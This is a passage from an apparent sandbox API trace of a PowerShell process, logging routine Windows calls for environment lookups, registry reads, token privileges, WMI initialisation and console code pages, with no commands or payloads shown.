lpBuffer="") returned 0x0 [0339.689] EtwEventActivityIdControl () returned 0x0 [0339.690] EtwEventActivityIdControl () returned 0x0 [0339.690] EtwEventActivityIdControl () returned 0x0 [0339.690] EtwEventActivityIdControl () returned 0x0 [0339.690] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.691] EtwEventActivityIdControl () returned 0x0 [0339.691] EtwEventActivityIdControl () returned 0x0 [0339.691] EtwEventActivityIdControl () returned 0x0 [0339.691] EtwEventActivityIdControl () returned 0x0 [0339.691] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0x41a00763, Data2=0x6d58, Data3=0x4e00, Data4=([0]=0x8d, [1]=0x13, [2]=0x70, [3]=0x14, [4]=0x55, [5]=0x3b, [6]=0xc, [7]=0x7a))) returned 0x0 [0339.691] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0xcc3141be, Data2=0x3c19, Data3=0x4465, Data4=([0]=0x86, [1]=0x16, [2]=0xf5, [3]=0x3c, [4]=0x43, [5]=0xe7, [6]=0x8b, [7]=0x7e))) returned 0x0 [0339.692] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.692] EtwEventActivityIdControl () returned 0x0 [0339.692] EtwEventActivityIdControl () returned 0x0 [0339.692] EtwEventActivityIdControl () returned 0x0 [0339.693] EtwEventActivityIdControl () returned 0x0 [0339.710] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62db78 | out: phkResult=0x1b62db78*=0x7cc) returned 0x0 [0339.711] RegQueryValueExW (in: hKey=0x7cc, lpValueName="appcompat", lpReserved=0x0, lpType=0x1b62dbc8, lpData=0x0, lpcbData=0x1b62dbc0*=0x0 | out: lpType=0x1b62dbc8*=0x0, lpData=0x0, lpcbData=0x1b62dbc0*=0x0) returned 0x2 [0339.711] RegCloseKey (hKey=0x7cc) returned 0x0 [0339.715] EtwEventActivityIdControl () returned 0x0 [0339.715] EtwEventActivityIdControl () returned 0x0 [0339.720] SetEvent (hEvent=0x7c0) returned 1 [0339.720] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b62e330*=0x7c0, lpdwindex=0x1b62e114 | out: lpdwindex=0x1b62e114) returned 0x0 [0339.730] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62e460, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.733] GetStdHandle (nStdHandle=0xfffffff4) returned 0x58 [0339.734] GetFileType (hFile=0x58) returned 0x2 [0339.734] GetConsoleMode (in: hConsoleHandle=0x58, lpMode=0x1b62e648 | out: lpMode=0x1b62e648) returned 1 [0339.736] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62e628 | out: lpConsoleScreenBufferInfo=0x1b62e628) returned 1 [0339.737] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62e628 | out: lpConsoleScreenBufferInfo=0x1b62e628) returned 1 [0341.049] EtwEventActivityIdControl () returned 0x0 [0341.049] EtwEventActivityIdControl () returned 0x0 [0341.049] EtwEventActivityIdControl () returned 0x0 [0342.099] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62de00, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0342.242] EtwEventActivityIdControl () returned 0x0 [0342.242] EtwEventActivityIdControl () returned 0x0 [0342.242] EtwEventActivityIdControl () returned 0x0 [0342.740] EtwEventActivityIdControl () returned 0x0 [0342.858] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7cc [0342.858] CoCreateGuid (in: pguid=0x1b62e238 | out: pguid=0x1b62e238*(Data1=0x6e77ea9f, Data2=0xf46b, Data3=0x4ce7, Data4=([0]=0xae, [1]=0x10, [2]=0x54, [3]=0x69, [4]=0x6a, [5]=0x3, [6]=0x16, [7]=0xc1))) returned 0x0 [0344.273] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a8949f0 [0344.276] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a895380 [0344.374] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a895490 [0344.388] GetModuleHandleA (lpModuleName="kernelbase.dll") returned 0x7fffca790000 [0344.389] GetProcAddress (hModule=0x7fffca790000, lpProcName="EncodePointer") returned 0x7fffccaa17e0 [0344.423] malloc (_Size=0x118) returned 0x6f9700 [0344.461] MI_ApplicationWrapper_Initialize () returned 0x0 [0344.477] MI_Application_InitializeV1 () returned 0x0 [0344.478] MI_Helpers_SetClrIsNotShuttingDown () returned 0x0 [0344.479] malloc (_Size=0x18) returned 0x6f6200 [0344.506] malloc (_Size=0x100) returned 0x6fbff0 [0344.507] __dllonexit () returned 0x7fffbdc359a0 [0344.507] __dllonexit () returned 0x7fffbdc359c0 [0344.507] __dllonexit () returned 0x7fffbdc359e0 [0344.507] __dllonexit () returned 0x7fffbdc35a00 [0344.507] MI_Application_InitializeV1 () returned 0x0 [0344.507] PublishDebugMessage () returned 0x1 [0344.507] GetProcessHeap () returned 0x510000 [0344.507] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xf8) returned 0x1a848360 [0344.507] GetProcessHeap () returned 0x510000 [0344.507] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x1a8a8590 [0344.507] GetProcessHeap () returned 0x510000 [0344.507] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x1a8a8490 [0344.507] GetProcessHeap () returned 0x510000 [0344.507] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x1a8a8750 [0344.507] GetProcessHeap () returned 0x510000 [0344.507] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x1a8abf10 [0344.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x804 [0344.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7f4 [0344.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x80c [0344.508] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x808 [0344.508] CreateThreadpoolWork (in: pfnwk=0x7fffbdc32100, pv=0x1a848360, pcbe=0x1b62dd70 | out: pv=0x1a848360) returned 0x1a846b60 [0344.508] TpPostWork () returned 0x3 [0344.508] WaitForSingleObject (hHandle=0x808, dwMilliseconds=0xffffffff) returned 0x0 [0344.509] CloseHandle (hObject=0x808) returned 1 [0344.509] PublishDebugMessage () returned 0x1 [0344.509] GetProcessHeap () returned 0x510000 [0344.509] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x58) returned 0x1a899e40 [0344.510] GetProcessHeap () returned 0x510000 [0344.510] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc) returned 0x1a8a83d0 [0344.510] memcpy (in: _Dst=0x1a8a83d0, _Src=0x1a8a87f0, _Size=0xc | out: _Dst=0x1a8a83d0) returned 0x1a8a83d0 [0344.510] GetProcessHeap () returned 0x510000 [0344.510] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc) returned 0x1a8a87d0 [0344.510] memcpy (in: _Dst=0x1a8a87d0, _Src=0x1a8a8930, _Size=0xc | out: _Dst=0x1a8a87d0) returned 0x1a8a87d0 [0344.510] PublishDebugMessage () returned 0x1 [0344.510] GetProcessHeap () returned 0x510000 [0344.510] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x180) returned 0x1a7f2f70 [0344.510] ??0WMISchema@@QEAA@XZ () returned 0x1a7f2f70 [0344.510] GetProcessHeap () returned 0x510000 [0344.510] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x30) returned 0x1b67c320 [0344.510] GetProcessHeap () returned 0x510000 [0344.510] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x30) returned 0x1b67c560 [0344.510] GetProcessHeap () returned 0x510000 [0344.510] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x1a8a8970 [0344.510] GetProcessHeap () returned 0x510000 [0344.510] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x28) returned 0x1a8abee0 [0344.510] PublishDebugMessage () returned 0x1 [0344.510] GetCurrentThread () returned 0xfffffffffffffffe [0344.510] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x2e, OpenAsSelf=1, TokenHandle=0x1a7f30d8 | out: TokenHandle=0x1a7f30d8*=0x808) returned 1 [0344.510] GetTokenInformation (in: TokenHandle=0x808, TokenInformationClass=0x3, TokenInformation=0x1b62dd00, TokenInformationLength=0x10, ReturnLength=0x1b62dd40 | out: TokenInformation=0x1b62dd00, ReturnLength=0x1b62dd40) returned 0 [0344.510] GetLastError () returned 0x7a [0344.510] GetProcessHeap () returned 0x510000 [0344.511] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x124) returned 0x1a86eb70 [0344.511] GetTokenInformation (in: TokenHandle=0x808, TokenInformationClass=0x3, TokenInformation=0x1a86eb70, TokenInformationLength=0x124, ReturnLength=0x1b62dd40 | out: TokenInformation=0x1a86eb70, ReturnLength=0x1b62dd40) returned 1 [0344.511] AdjustTokenPrivileges (in: TokenHandle=0x808, DisableAllPrivileges=0, NewState=0x1a86eb70*(PrivilegesCount=0x18, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=36, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=1239798751, Attributes=0x90001400), (Luid.LowPart=0x0, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=1209863328, Attributes=0x7fff), (Luid.LowPart=0x7fff, Luid.HighPart=1207343648, Attributes=0x7fff), (Luid.LowPart=0x7fff, Luid.HighPart=1207337856, Attributes=0x7fff), (Luid.LowPart=0x7fff, Luid.HighPart=1207348832, Attributes=0x7fff))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0344.511] GetProcessHeap () returned 0x510000 [0344.511] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x1a86eb70) returned 1 [0344.511] ClassCache_New () returned 0x0 [0344.511] ResultToHRESULT () returned 0x0 [0344.511] PublishDebugMessage () returned 0x1 [0344.512] GetProcessHeap () returned 0x510000 [0344.512] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x1a8a8430 [0344.512] PublishDebugMessage () returned 0x1 [0344.512] MI_Helpers_GetCurrentSecurityToken () returned 0x0 [0344.513] CoCreateGuid (in: pguid=0x1b62e0c8 | out: pguid=0x1b62e0c8*(Data1=0x3dc062ac, Data2=0x28b4, Data3=0x402e, Data4=([0]=0x8f, [1]=0x36, [2]=0xab, [3]=0x56, [4]=0xa3, [5]=0xfe, [6]=0xb4, [7]=0x5e))) returned 0x0 [0344.608] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7dc [0344.608] CoCreateGuid (in: pguid=0x1b62e218 | out: pguid=0x1b62e218*(Data1=0x9e724fb, Data2=0x903f, Data3=0x4d5e, Data4=([0]=0x90, [1]=0xe0, [2]=0xa8, [3]=0x5, [4]=0x5a, [5]=0xfa, [6]=0x9f, [7]=0xb1))) returned 0x0 [0344.653] GetComputerNameW (in: lpBuffer=0x1b62df30, nSize=0x1b62e258 | out: lpBuffer="PXTHFFRYO7", nSize=0x1b62e258) returned 1 [0344.873] EtwEventWriteTransfer () returned 0x0 [0344.880] GetComputerNameW (in: lpBuffer=0x1b62dc50, nSize=0x1b62df78 | out: lpBuffer="PXTHFFRYO7", nSize=0x1b62df78) returned 1 [0344.899] EtwEventWriteTransfer () returned 0x0 [0345.214] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1a8742c0*=0x720, lpdwindex=0x1b62db54 | out: lpdwindex=0x1b62db54) returned 0x0 [0345.225] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5b9be0*=0x81c, lpdwindex=0x1b62d844 | out: lpdwindex=0x1b62d844) returned 0x0 [0345.226] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62e018 | out: lpConsoleScreenBufferInfo=0x1b62e018) returned 1 [0345.351] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62e018 | out: lpConsoleScreenBufferInfo=0x1b62e018) returned 1 [0345.445] GetConsoleOutputCP () returned 0x1b5 [0345.447] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62ddd8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62ddd8) returned 0 [0345.450] GetConsoleOutputCP () returned 0x1b5 [0345.451] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62dd78, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62dd78) returned 0 [0345.451] GetConsoleOutputCP () returned 0x1b5 [0345.452] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62dd18, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62dd18) returned 0 [0345.452] GetConsoleOutputCP () returned 0x1b5 [0345.453] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62dd78, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62dd78) returned 0 [0345.454] GetConsoleOutputCP () returned 0x1b5 [0345.462] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.462] GetConsoleOutputCP () returned 0x1b5 [0345.463] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.463] GetConsoleOutputCP () returned 0x1b5 [0345.464] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.464] GetConsoleOutputCP () returned 0x1b5 [0345.465] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.465] GetConsoleOutputCP () returned 0x1b5 [0345.466] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.466] GetConsoleOutputCP () returned 0x1b5 [0345.467] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.467] GetConsoleOutputCP () returned 0x1b5 [0345.468] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.468] GetConsoleOutputCP () returned 0x1b5 [0345.469] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.469] GetConsoleOutputCP () returned 0x1b5 [0345.469] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.469] GetConsoleOutputCP () returned 0x1b5 [0345.486] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.486] GetConsoleOutputCP () returned 0x1b5 [0345.487] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.488] GetConsoleOutputCP () returned 0x1b5 [0345.488] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.488] GetConsoleOutputCP () returned 0x1b5 [0345.489] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.489] GetConsoleOutputCP () returned 0x1b5 [0345.490] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.490] GetConsoleOutputCP () returned 0x1b5 [0345.491] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.491] GetConsoleOutputCP () returned 0x1b5 [0345.492] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.492] GetConsoleOutputCP () returned 0x1b5 [0345.492] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.492] GetConsoleOutputCP () returned 0x1b5 [0345.493] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.493] GetConsoleOutputCP () returned 0x1b5 [0345.494] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.494] GetConsoleOutputCP () returned 0x1b5 [0345.495] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.495] GetConsoleOutputCP () returned 0x1b5 [0345.495] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.495] GetConsoleOutputCP () returned 0x1b5 [0345.496] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.496] GetConsoleOutputCP () returned 0x1b5 [0345.497] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.497] GetConsoleOutputCP () returned 0x1b5 [0345.497] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.497] GetConsoleOutputCP () returned 0x1b5 [0345.498] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.498] GetConsoleOutputCP () returned 0x1b5 [0345.498] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.498] GetConsoleOutputCP () returned 0x1b5 [0345.499] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.499] GetConsoleOutputCP () returned 0x1b5 [0345.499] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.499] GetConsoleOutputCP () returned 0x1b5 [0345.500] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.500] GetConsoleOutputCP () returned 0x1b5 [0345.500] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.501] GetConsoleOutputCP () returned 0x1b5 [0345.508] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.508] GetConsoleOutputCP () returned 0x1b5 [0345.508] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.508] GetConsoleOutputCP () returned 0x1b5 [0345.509] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.509] GetConsoleOutputCP () returned 0x1b5 [0345.509] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.509] GetConsoleOutputCP () returned 0x1b5 [0345.510] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.510] GetConsoleOutputCP () returned 0x1b5 [0345.511] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.511] GetConsoleOutputCP () returned 0x1b5 [0345.511] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.511] GetConsoleOutputCP () returned 0x1b5 [0345.512] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.512] GetConsoleOutputCP () returned 0x1b5 [0345.512] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.512] GetConsoleOutputCP () returned 0x1b5 [0345.513] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.513] GetConsoleOutputCP () returned 0x1b5 [0345.513] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.513] GetConsoleOutputCP () returned 0x1b5 [0345.514] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.514] GetConsoleOutputCP () returned 0x1b5 [0345.514] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.515] GetConsoleOutputCP () returned 0x1b5 [0345.515] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.515] GetConsoleOutputCP () returned 0x1b5 [0345.516] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.516] GetConsoleOutputCP () returned 0x1b5 [0345.516] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.516] GetConsoleOutputCP () returned 0x1b5 [0345.517] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.517] GetConsoleOutputCP () returned 0x1b5 [0345.517] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.518] GetConsoleOutputCP () returned 0x1b5 [0345.518] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.518] GetConsoleOutputCP () returned 0x1b5 [0345.522] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.523] GetConsoleOutputCP () returned 0x1b5 [0345.523] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.523] GetConsoleOutputCP () returned 0x1b5 [0345.524] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.524] GetConsoleOutputCP () returned 0x1b5 [0345.524] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.524] GetConsoleOutputCP () returned 0x1b5 [0345.525] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.525] GetConsoleOutputCP () returned 0x1b5 [0345.525] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.525] GetConsoleOutputCP () returned 0x1b5 [0345.526] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.526] GetConsoleOutputCP () returned 0x1b5 [0345.526] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.526] GetConsoleOutputCP () returned 0x1b5 [0345.527] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.527] GetConsoleOutputCP () returned 0x1b5 [0345.528] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.528] GetConsoleOutputCP () returned 0x1b5 [0345.528] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.528] GetConsoleOutputCP () returned 0x1b5 [0345.529] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.529] GetConsoleOutputCP () returned 0x1b5 [0345.529] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.529] GetConsoleOutputCP () returned 0x1b5 [0345.530] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62def8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62def8) returned 0 [0345.530] GetConsoleOutputCP () returned 0x1b5 [0345.530] TranslateCharsetInfo (in: 